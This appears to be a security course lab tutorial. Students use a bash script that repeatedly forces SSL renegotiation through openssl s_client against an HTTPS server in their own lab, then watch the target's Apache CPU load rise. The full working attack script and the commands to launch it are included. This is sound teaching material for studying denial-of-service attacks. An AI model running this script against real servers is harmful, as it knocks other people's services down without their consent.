HTTPS-DoS (NETLAB)

Before you Start

You need A Linux machine, serving a page via HTTPS. This is the Kali64. You should have prepared that machine in a previous project. It's your Kali64 machine.

Use your Kali32 Machine

Open the Kali32 virtual machine. Log in as root with the password toor

This machine will perform the attack.

Viewing the Secure Page from the Kali32 Machine

On the Kali32 Linux machine, open IceWeasel and go to this address:
https://172.16.1.202

A warning page appears, saying "This Connection is Untrusted". That's happening because your SSL certificate is self-signed, rather than purchased from a real Certificate Authority like Verisign.

Click "I Understand the Risks".

Click the "Add Exception" button.

Click the "Confirm Security Exception" button.

You should see the secure page open, as shown below:

Making the ssl-dos script

On the Kali32 Linux machine, in a Terminal window, execute this command:
nano ssl-dos

Enter the following script. Notice the use of command-line arguments $1 and $2.

echo "Usage: ./ssl-dos IP COUNT"
echo "Attacking host: $1 with $2 requests"
echo
read -sn 1 -p "Press any key to continue..."

for i in `seq 1 $2`;
do
clear
echo "*********************************** REQUEST # $i"
echo
echo R | openssl s_client -connect $1:443 2>/dev/null;
COUNT=`expr $COUNT + 1`
done

Your screen should look like the image below:

Testing the ssl-dos Script

On the Kali32 Linux machine, in a Terminal window, enter these commands, pressing Enter after each one.

Use your Kali64 https server's IP address, not the example IP address shown below.

chmod a+x ssl-dos

./ssl-dos 172.16.1.202 2

When you see the "Press any key to continue..." message, press Enter.

A lot of text scrolls by, ending with the line:

Verify return code: 18 (self signed certificate)

Your screen should like the image shown below:

Running top on the Kali64 Machine

On your Kali64 machine, in a Terminal window, enter this command, and then press Enter:
top
On the upper left of the window, you should see a low CPUusage. In the image below, the usage is around 2%, with 97.7$ idle.

Running the Attack from your Kali32 Machine

On the Kali32 Linux machine, in a Terminal window, enter this commands, and then press Enter:

Use your Kali64 https server's IP address, not the example IP address shown below.

./ssl-dos 172.16.1.202 500

When you see the "Press any key to continue..." message, press Enter.

You should see screens of certificate data flickering by.

Observing the Effect of the Attack

On your Kali64 machine, on the right side, you should see "apache2" processes consuming a lot of CPU. When I did it, I saw 19.3%--the exact value you see may be different, but it should be larger than the value you saw before the attack started.


Sources

http://www.tc.umn.edu/~brams006/selfsign.html

Originally written on or before: 10-27-11 6 pm

Modified 10-27-15
Modified for NETLAB 6-16-16